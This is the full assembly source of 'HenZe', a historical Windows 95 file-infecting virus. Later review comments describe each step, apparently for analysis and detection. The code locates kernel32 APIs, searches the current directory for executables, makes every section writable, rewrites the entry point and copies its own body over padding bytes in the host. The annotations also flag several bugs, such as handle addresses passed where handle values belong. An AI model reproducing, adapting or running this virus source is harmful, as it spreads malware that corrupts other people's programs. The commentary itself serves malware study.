;----------------------------  W95 HenZe BY HenKy -----------------------------
;
;-AUTHOR:        HenKy
;
;-MAIL:          HenKy_@latinmail.com
;
;-ORIGIN:        SPAIN
;


; NOTE(review): this listing is a historical Win9x file-infecting virus (TASM
; syntax, Intel operand order).  The comments added below describe what the
; code actually does, for analysis and detection purposes only; none of the
; behaviour has been changed.
;
; Build directives: privileged 586 instruction set, 32-bit flat model.
; LOCALS (TASM) enables @@-style local labels; none are used in this file.
.586P
.MODEL FLAT
LOCALS


EXTRN       ExitProcess:PROC        ; referenced only from EXITPROC at the very end

; Hard-coded kernel32 image base of the Win9x build this was written against.
; WINES dereferences this address before anything confirms the page is mapped,
; so on a system where it is not, the first CMP faults instead of reaching
; the WARNING fallback.
KERNEL95    EQU 0BFF70000h
; Size of the body that is copied into a host: MEGAMIX .. FILE_END.
MIX_SIZ     EQU FILE_END-MEGAMIX
; Size including the run-time variables that follow FILE_END (up to MEM_END).
; Defined but never referenced in this listing.
MIX_MEM     EQU MEM_END-MEGAMIX
NABLA       EQU DELTA-MEGAMIX       ; offset of the delta label inside the body; unused
; Offset from the "PE" signature of the one-byte infection marker ('H').
; By the standard PE layout this byte sits inside the optional header's
; MinorOperatingSystemVersion field.
MARKA       EQU 66
; CODE | EXECUTE | WRITE section flags.  Defined but never used: the WRI loop
; below writes the literal 0C0000040h into every section header instead.
FLAGZ       EQU 00000020H OR 20000000H OR 80000000H
; Unused.  Note that the cFileName buffer reserved after Win32FindData (FNAME)
; is only 24 bytes, not MAX_PATH.
MAX_PATH    EQU 260

; Expands to MIX_SIZ as four ASCII decimal digits (thousands .. units).
; Used only by the copyright string in .DATA, which lies outside the copied
; body and is therefore never written into a host.
MACROSIZE   MACRO

            DB      MIX_SIZ/01000 mod 10 + "0"
            DB      MIX_SIZ/00100 mod 10 + "0"
            DB      MIX_SIZ/00010 mod 10 + "0"
            DB      MIX_SIZ/00001 mod 10 + "0"

            ENDM

    ; LAME W9X PARASITIC RUNTIME PADDINGX OVERWRITER
    ; INFECTED FILES WON'T GROW, BUT THEY NEED A RUN OF "PADDINGXX" FILLER BYTES
    ; LONG ENOUGH TO HOLD THE BODY (USUALLY FOUND AT THE RELOC SECTION)

	; MOV 
	; CALL 
	; JNZ      ONLY SIX OPCODES WERE USED.. xDDD
	; ADD   /
	; SUB  /
	; CMP /

		 ; AND NO INDEXING MODE (EASY DISASM CODE)

		;MOV EAX,[EBP+5]

		;TURNS INTO:

		; ADD EBP,5
		; MOV EAX,[EBP]

		;AND SO...

       ; *INFINITE* THX TO T00FiC FOR THE REDUCED OPCODE SET IDEA AND

       ;  SEVERAL META TIPS

; Static data of the first-generation dropper only.  Nothing in this section
; lies between MEGAMIX and FILE_END, so it is never copied into a host.
.DATA

copyrisgt   DB 'HenZe '         ; name string, followed by the body size in decimal

        MACROSIZE               ; four ASCII digits of MIX_SIZ (see macro above)
.CODE

           ; BIZARRE VIRUS BEGINS...
; Entry point (END MEGAMIX).  Register roles for the whole body:
;   EBP = run-time address of DELTA.  Every variable is reached as
;         OFFSET var + EBP - OFFSET DELTA (three instructions, because the
;         author deliberately avoids indexed addressing and PUSH/POP; see the
;         comment block above).
; No registers are preserved for the host and the stack is never realigned.
MEGAMIX:


        ; The immediate of this MOV is patched through MILO when the body is
        ; copied into a host (see PO): it becomes the host VA of DELTA, so the
        ; copy learns its own load address without a CALL/POP delta trick.
        ; 401005H is the first-generation value and assumes the dropper's code
        ; starts at 401000H (MOV EAX,imm32 is five bytes long).
        MOV     EAX, 401005H
   MILO EQU     $-4
DELTA:
        MOV     EBP,EAX
WINES:
        ; Expect an MZ header at the hard-coded kernel32 base; otherwise give
        ; up and run the host.  The read itself is unguarded (see KERNEL95).
        MOV     EAX,KERNEL95
        MOV     CL,'M'
        CMP     BYTE PTR [EAX],CL
        JNZ     WARNING
        MOV     EBX,EAX                 ; EBX = kernel32 base, used as hModule below
        MOV     EDX,02b226A57h ; GPA SIGNATURE FOR W9X

; Scan forward one byte at a time from the kernel32 base until the signature
; dword is found.  There is no upper bound: if the signature is absent the
; loop runs until it walks into an unmapped page.  The address at which the
; dword is found is used directly as the GetProcAddress entry, so the
; signature is presumably the first four code bytes of that function in the
; targeted kernel32 build.
BUSCA3:
        ADD     EAX,1
        CMP     DWORD PTR [EAX],EDX
        JNZ     SHORT BUSCA3
 APIZ:

        MOV     ECX,OFFSET GPA
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        MOV     [ECX],EAX               ; GPA = address where the signature was found
        MOV     ESI, OFFSET APIs        ; ESI -> NUL-separated import names
        ADD     ESI,EBP
        SUB     ESI,OFFSET DELTA
        MOV     EDI,OFFSET APIaddresses ; EDI -> parallel table of resolved pointers
        ADD     EDI,EBP
        SUB     EDI,OFFSET DELTA

; Resolve each name: GetProcAddress(EBX = hModule, ESI = name).  Arguments are
; built with SUB ESP,4 / MOV [ESP] because PUSH is outside the chosen opcode
; set (stdcall, right-to-left, so the name goes on first).
GPI:    SUB     ESP,4
        MOV     [ESP],ESI
        SUB     ESP,4
        MOV     [ESP],EBX
        MOV     ECX,OFFSET GPA
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        CALL    [ECX]

        ; The result is stored unconditionally: a 0 (name not found) is
        ; written into the table and later CALLed as if it were a function.
        MOV     [EDI],EAX
        ADD     EDI,4


; Advance ESI past the current name's terminating NUL.  A second NUL right
; after it (the Zero_ byte) ends the list; anything else is the next name.
 NPI:
        MOV     AL,BYTE PTR [ESI]
        ADD     ESI,1

        CMP     AL,0
        JNZ     SHORT NPI
        CMP     [ESI], AL
        JNZ     GPI


; FindFirstFileA(IMASK = "*.ExE", &Win32FindData) in the current directory.
; The search handle is stored in SearcHandle and also left in EAX for LOOPER.
; NOTE(review): the find-data buffer reserved below is shorter than the
; documented WIN32_FIND_DATAA (cFileName is MAX_PATH bytes, followed by
; cAlternateFileName), so this call writes past MEM_END -- in a host, into
; whatever follows the padding run the body was written over.
INFECT:

        MOV     EAX, OFFSET Win32FindData
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX,OFFSET IMASK
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX
        MOV     EAX,OFFSET FindFirstFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]
        MOV     EBX, OFFSET SearcHandle
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX


; Entered with EAX = FindFirstFileA's handle (first pass) or FindNextFileA's
; BOOL (from TOPO).  -1 means INVALID_HANDLE_VALUE: no *.ExE present.
LOOPER:
        CMP     EAX,-1
        JNZ     SUPPER


; Hand control to the host.  The ORG $-4 backs the location counter up so
; that OLD_EIP overlays the immediate of the MOV: the instruction is really
; MOV EAX,<host original entry VA>.  In the first generation that value is the
; hard-coded 00401000H; in a host it is the entry read from the victim's PE
; header before the copy (see the AddressOfEntryPoint code after WRI).
; ADD ESP,4 discards the dword on top of the stack (on the fall-through paths
; this is the return address pushed by whoever called the entry point), then
; CALL EAX enters the host.  Because it is a CALL and not a JMP, if the host
; ever returns, execution continues at SUPPER with the host's return value in
; EAX.
WARNING:

        MOV     EAX,12345678H
        ORG     $-4
OLD_EIP DD      00401000H
        ADD     ESP,4
        CALL    EAX   ; SUXXX!!! I DONT WANT TO WASTE JMP HERE

; EAX = 0 means FindNextFileA failed (end of directory) -> run the host.
; "CMP ESP,0 / JNZ" is this file's unconditional jump: ESP is never zero and
; JMP is outside the six-opcode set.
SUPPER:

        CMP      EAX,0
        JNZ      ALLKEY
PILLE:
        CMP      ESP,0   ; ESP NEVER IS ZERO
        JNZ      WARNING

; Open the file named in the find data.
; The first dword pushed here is NOT a CreateFileA argument: it is the current
; OLD_EIP (the entry VA of the host this body lives in).  OLD_EIP is
; overwritten with the victim's entry before the copy and this saved value is
; popped back into it at Cerrar, which every path from here reaches.
ALLKEY:

        SUB     ESP,4
        MOV     EAX,OFFSET OLD_EIP
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     EBX,[EAX]
        MOV     [ESP],EBX
        ; CreateFileA arguments, right to left.  EDX is never set on this
        ; path; it holds whatever the previous API call left in it, so the
        ; three arguments taken from it (hTemplateFile, lpSecurityAttributes,
        ; dwShareMode) are effectively uninitialized.
        SUB     ESP,4
        MOV     [ESP],EDX               ; hTemplateFile       = EDX (garbage)
        SUB     ESP,4
        MOV     [ESP],00000080h         ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
        SUB     ESP,4
        MOV     [ESP],3                 ; dwCreationDisposition = OPEN_EXISTING
        SUB     ESP,4
        MOV     [ESP],EDX               ; lpSecurityAttributes = EDX (garbage)
        SUB     ESP,4
        MOV     [ESP],EDX               ; dwShareMode          = EDX (garbage)
        SUB     ESP,4
        MOV     [ESP],0C0000000h        ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE

        MOV     EAX ,offset FNAME        ; OPEN IT!
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX               ; lpFileName = cFileName from the find data
        MOV     EAX, OFFSET CreateFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

        ; The handle is stored without checking for INVALID_HANDLE_VALUE
        ; (read-only or locked file); a failed open flows straight into
        ; CreateFileMappingA below.
        MOV     EBX,OFFSET FileHandle
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     [EBX],EAX  ; SAVE HNDL
        MOV     EBX,OFFSET WFD_nFileSizeLow
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     ECX, [EBX]              ; ECX = file size (low dword only; nFileSizeHigh is ignored)

        ; CreateFileMappingA(FileHandle, NULL, 4 = PAGE_READWRITE,
        ;                    0, nFileSizeLow, NULL) -- result unchecked.
        MOV     EDX,0
        SUB     ESP,4
        MOV     [ESP],EDX               ; lpName
        SUB     ESP,4
        MOV     [ESP],ECX               ; dwMaximumSizeLow
        SUB     ESP,4
        MOV     [ESP],EDX               ; dwMaximumSizeHigh
        SUB     ESP,4
        MOV     [ESP],4H                ; flProtect = PAGE_READWRITE
        SUB     ESP,4
        MOV     [ESP],EDX               ; lpAttributes

        SUB     ESP,4
        MOV     EBX,OFFSET FileHandle
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     ECX,[EBX]
        MOV     [ESP],ECX               ; hFile (handle VALUE, unlike the close calls later)
        MOV     EAX, OFFSET CreateFileMappingA
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

        MOV     EBX,OFFSET MapHandle
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     [EBX],EAX

        MOV     EBX,OFFSET WFD_nFileSizeLow
        ADD     EBX,EBP
        SUB     EBX, OFFSET DELTA
        MOV     ECX, [EBX]

        ; MapViewOfFile(MapHandle, 2 = FILE_MAP_WRITE, 0, 0, nFileSizeLow).
        ; A NULL result is not detected: the header reads below would then
        ; dereference offset 3Ch of address 0.
        MOV     EDX,0
        SUB     ESP,4
        MOV     [ESP],ECX               ; dwNumberOfBytesToMap
        SUB     ESP,4
        MOV     [ESP],EDX               ; dwFileOffsetLow
        SUB     ESP,4
        MOV     [ESP],EDX               ; dwFileOffsetHigh
        ADD     EDX,2
        SUB     ESP,4
        MOV     [ESP],EDX               ; dwDesiredAccess = FILE_MAP_WRITE
        SUB     ESP,4
        MOV     ECX, OFFSET MapHandle
        ADD     ECX,EBP
        SUB     ECX,OFFSET DELTA
        MOV     EBX,[ECX]
        MOV     [ESP],EBX               ; hFileMappingObject
        MOV     EBX, OFFSET MapViewOfFile
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        CALL    [EBX]

        MOV     EBX,OFFSET  MapAddress
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX
        ; ESI = map + e_lfanew (MZ header offset 3Ch).  e_lfanew is not
        ; bounds-checked against the file size, and only the 'P' of the
        ; "PE\0\0" signature is verified.
        MOV     ESI,EAX                         ; GET PE HDR
        MOV     EDX,EAX
        ADD     EAX,3CH
        MOV     ESI,[EAX]
        ADD     ESI,EDX
        CMP     BYTE PTR [ESI],"P"            ; IS A 'P'E ?
        JNZ     Cerrar
        ; Infection marker: 'H' at PE+MARKA means already infected -> Cerrar.
        ; (The map view and mapping handle are not released on that path.)
        ADD     ESI,MARKA
        CMP     BYTE PTR [ESI],"H"     ; HenKy IS HERE ?
        JNZ     Cerrar1
        CMP     ESP,0
        JNZ     Cerrar
; Candidate host.  PE+3Ch = FileAlignment, PE+56 = SectionAlignment (both in
; the optional header).  They must be equal because PO later stores a raw
; file offset straight into AddressOfEntryPoint, which is only a valid RVA
; when file offsets and RVAs coincide.
Cerrar1:
        SUB     ESI,MARKA
        MOV     EBX,ESI
        ADD     EBX,3CH
        MOV     EAX,[EBX] ; ONLY SOME W98  HAVE 1000H/1000H INSTEAD 1000H/200H
        MOV     ECX,ESI
        ADD     ECX,56
        CMP     EAX,[ECX]
        JNZ     Cerrar

        ; Save the PE header pointer (popped after the loop), then locate the
        ; section table:
        ;   ECX = NumberOfSections (PE+6; only the low byte of the WORD is read)
        ;   EBX = NumberOfRvaAndSizes (PE+74h) * 8 = size of the data directory
        ;   ESI = PE+78h (data directory) + EBX (= section table) + 24h
        ;       = Characteristics of the first section header
        SUB     ESP,4
        MOV     [ESP],ESI
        MOV     ECX,0
        MOV     EDI,ESI
        ADD     EDI,6
        MOV     CL,BYTE PTR [EDI]
        ADD     EDI,74H-6
        MOV     EBX,[EDI]
        ADD     EBX,EBX
        ADD     EBX,EBX
        ADD     EBX,EBX                 ; EBX *= 8 (no SHL in the opcode set)
        ADD     ESI,78H
        ADD     ESI,EBX
        ADD     ESI,24H
; Overwrite every section's Characteristics with 0C0000040h
; (MEM_READ | MEM_WRITE | CNT_INITIALIZED_DATA), stepping 40 bytes per header.
; Why: the body's run-time variables (APIaddresses .. MEM_END) live beyond
; FILE_END, i.e. in whatever host bytes follow the padding run, and those
; must be writable.  The write also strips CODE/EXECUTE from the host's code
; section; the author presumably relies on Win9x not enforcing execute
; permission.  Note the file is modified here (and marked below) before a
; padding run has been located at all.
 WRI:
        MOV     DWORD PTR [ESI], 0C0000040h
        ADD     ESI,40
        SUB     ECX,1
        CMP     ECX,0
        JNZ     WRI

        MOV     ESI,[ESP]
        ADD     ESP,4

        ; EAX = AddressOfEntryPoint (PE+28h) + ImageBase (PE+34h) = host entry VA.
        ; BASE    <- ImageBase of this victim
        ; OLD_EIP <- victim's original entry VA (this is the value the copied
        ;            body's WARNING will CALL; the running body's own OLD_EIP
        ;            is restored from the stack at Cerrar).
        MOV     EDI,ESI
        ADD     ESI,28H
        MOV     EAX,[ESI]
        ADD     ESI,34H-28H
        ADD     EAX,[ESI]
        MOV     ECX,[ESI]
        MOV     EDX,OFFSET BASE
        ADD     EDX,EBP
        SUB     EDX,OFFSET DELTA
        MOV     [EDX],ECX
        MOV     EBX,OFFSET OLD_EIP
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        MOV     [EBX],EAX
        MOV     ESI,EDI
        ADD     ESI,MARKA
        MOV     BYTE PTR [ESI],"H" ;  HenKy!
        MOV     EAX,OFFSET WFD_nFileSizeLow
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     ECX,[EAX]               ; ECX = file size = scan budget
        MOV     EAX,EDI                 ; EAX = PE header (used again in PO)
; Byte-wise scan for the dword 'XGNI' followed by 'DAPX'.  With TASM's
; big-endian character constants those are the bytes "INGX" and "XPAD" in
; file order, i.e. the window "INGXXPAD" inside the linker's repeated
; "PADDINGXX" filler.  The scan starts at the PE header but counts down from
; the full file size, so it can read up to e_lfanew + 7 bytes beyond the
; mapped length.
 BU:
        CMP     DWORD PTR [EDI], 'XGNI'
        JNZ     PE
        CMP     ESP,0                   ; unconditional -> PO
        JNZ     PO

 PE:
        ADD     EDI,1
        SUB     ECX,1
        CMP     ECX,0
        JNZ     BU
        CMP     ESP,0                   ; no padding found -> Cerrar
        JNZ     Cerrar

; Match: EDI -> "INGX".  Verify the following "XPAD", then patch the header.
PO:
        MOV     ESI,EDI
        ADD     ESI,4
        CMP     DWORD PTR [ESI], 'DAPX'
        JNZ     PE
        SUB     ESP,4
        MOV     [ESP],EDI               ; save match address (restored below)
        MOV     EBX,OFFSET MapAddress
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        SUB     EDI,[EBX]               ; EDI = raw file offset of the match
        ADD     EAX,28H
        MOV     [EAX],EDI               ; new AddressOfEntryPoint (offset used as RVA)
        MOV     EBX,OFFSET BASE
        ADD     EBX,EBP
        SUB     EBX,OFFSET DELTA
        ADD     EDI,[EBX]               ; + ImageBase = VA of the copied MEGAMIX
        ADD     EDI,5                   ; + 5 = VA of the copied DELTA
        MOV     EDX,OFFSET MILO
        ADD     EDX,EBP
        SUB     EDX,OFFSET DELTA
        MOV     [EDX],EDI               ; patch the MOV EAX immediate for the copy

        MOV     EDI,[ESP]
        ADD     ESP,4

        ; Copy MIX_SIZ/4 dwords of the running body (with MILO and OLD_EIP
        ; already patched) over the padding.  Only eight filler bytes were
        ; verified; nothing checks that the run is at least MIX_SIZ long, so a
        ; shorter run means host data after it is overwritten.
        MOV     ESI,OFFSET MEGAMIX
        ADD     ESI,EBP
        SUB     ESI,OFFSET DELTA
        MOV     ECX,MIX_SIZ/4

BASTARDO_VIRUS:

        MOV     EAX,[ESI]
        MOV     [EDI],EAX
        ADD     ESI,4
        ADD     EDI,4
        SUB     ECX,1
        CMP     ECX,0
        JNZ     BASTARDO_VIRUS
; Cleanup after a successful write.  NOTE(review): unlike the open/map calls
; above (which load the handle with MOV reg,[var]), the four calls in this
; stretch push the ADDRESS of the variable, not its contents:
; UnmapViewOfFile(&MapAddress), CloseHandle(&MapHandle),
; CloseHandle(&FileHandle) and FindNextFileA(&SearcHandle, ...).  The
; documented APIs take the handle/pointer by value, so as written these
; release nothing, and FindNextFileA would be handed an invalid handle --
; which on this listing's own logic ends the loop after the first match.
; Documented only; not corrected here.
UnMapFile:

        MOV     EAX, OFFSET MapAddress
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX               ; pushes &MapAddress, not the view address
        MOV     EAX, OFFSET UnmapViewOfFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]

CloseMap:

        MOV     EAX, OFFSET MapHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX               ; pushes &MapHandle, not the handle
        MOV     EAX, OFFSET CloseHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]


; Common exit for every file (infected, rejected or already marked).
; Pops the OLD_EIP saved at ALLKEY back into OLD_EIP, undoing the overwrite
; done before the copy, then closes the file handle.  Rejected files never
; pass through UnMapFile/CloseMap, so their view and mapping are left open.
Cerrar:

        MOV     EAX,OFFSET OLD_EIP
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        MOV     EBX,[ESP]
        MOV     [EAX],EBX
        ADD     ESP,4

        MOV     EAX, OFFSET FileHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX               ; pushes &FileHandle, not the handle
        MOV     EAX, OFFSET CloseHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]


; FindNextFileA(&SearcHandle, &Win32FindData); the BOOL result goes back to
; LOOPER (where the -1 test can never match) and then SUPPER (0 = done).
TOPO:


        MOV     EAX, offset Win32FindData
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX

        MOV     EAX, OFFSET SearcHandle
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        SUB     ESP,4
        MOV     [ESP],EAX               ; pushes &SearcHandle, not the handle
        MOV     EAX, OFFSET FindNextFile
        ADD     EAX,EBP
        SUB     EAX,OFFSET DELTA
        CALL    [EAX]
        CMP     ESP,0                   ; unconditional -> LOOPER
        JNZ     LOOPER


; Import names resolved by GPI, NUL-separated, in the same order as the
; APIaddresses table below.  Zero_ supplies the second NUL that NPI treats as
; end of list.  Everything from here to FILE_END is still part of the copied
; body.
APIs:
        DB      "CreateFileA",0
        DB      "CloseHandle",0
        DB      "FindFirstFileA",0
        DB      "FindNextFileA",0
        DB      "MapViewOfFile",0
        DB      "UnmapViewOfFile",0
        DB      "CreateFileMappingA",0
Zero_   DB        0
BASE    DD        0                     ; ImageBase of the victim being processed

IMASK   DB       '*.ExE',0              ; FindFirstFileA search mask (current directory)
        DB        'HenZe LameVirus BY HenKy',0

align 4

; End of the bytes written into a host (MIX_SIZ = FILE_END - MEGAMIX).
; Everything below is run-time storage that is NOT copied: inside a host it
; maps onto whatever bytes follow the padding run, which is why WRI makes
; every section writable.
FILE_END               LABEL BYTE

; Resolved function pointers, filled by GPI in the order of the APIs list.
APIaddresses:

CreateFile          DD 0
CloseHandle         DD 0
FindFirstFile       DD 0
FindNextFile        DD 0
MapViewOfFile       DD 0
UnmapViewOfFile     DD 0
CreateFileMappingA  DD 0
GPA                 DD 0                ; GetProcAddress, found by signature scan (BUSCA3)
SearcHandle         DD 0                ; FindFirstFileA handle
FileHandle          DD 0                ; CreateFileA handle of the current victim
MapHandle           DD 0                ; CreateFileMappingA handle
MapAddress          DD 0                ; MapViewOfFile base of the current victim

FILETIME                STRUC

FT_dwLowDateTime        DD      ?
FT_dwHighDateTime       DD      ?

FILETIME                ENDS

; Find-data buffer.  The fields up to dwReserved1 (44 bytes) follow the
; WIN32_FIND_DATAA layout; FNAME is cFileName at offset 44, but only 24 bytes
; are reserved for it here.  FindFirstFileA/FindNextFileA fill the full
; structure (cFileName is MAX_PATH bytes, then cAlternateFileName), so the
; remainder is written past MEM_END.
Win32FindData:

WFD_dwFileAttributes    DD      ?
WFD_ftCreationTime      FILETIME ?
WFD_ftLastAccessTime    FILETIME ?
WFD_ftLastWriteTime     FILETIME ?
WFD_nFileSizeHigh       DD      ?
WFD_nFileSizeLow        DD      ?       ; the only size field the code uses
WFD_dwReserved0         DD      ?
WFD_dwReserved1         DD      ?
FNAME                   DD      0       ; cFileName (24 bytes reserved, see above)
                        DD      0
                        DD      0
                        DD      0
                        DD      0
                        DD      0
align 4


MEM_END                LABEL BYTE

; Not reached by any jump or call in this listing: every exit goes through
; WARNING's CALL OLD_EIP.  Presumably intended as the first-generation exit.
EXITPROC:

        PUSH 0
        CALL ExitProcess

ENDS
END MEGAMIX                             ; MEGAMIX is the entry point